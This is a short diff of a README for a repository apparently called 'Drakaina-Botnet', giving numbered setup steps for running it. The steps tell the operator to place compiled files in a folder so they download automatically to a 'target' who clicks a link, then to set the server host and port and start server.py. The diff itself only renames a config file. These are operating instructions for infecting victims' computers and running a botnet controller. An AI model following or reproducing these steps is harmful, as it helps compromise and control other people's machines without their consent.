h0lyl337/Drakaina-Botnet/README.md

 4) place both compiled files in the Windows folder you created ealiar, these files will be automatically downloaded to your target when they click the link.

-5) open server_config.cfg and change the server and port to what you want the server to run on.
+5) open server.cfg and change the server and port to what you want the server to run on.

 6) run server.py using " python server.py " or " python3 server.py " from the commandline.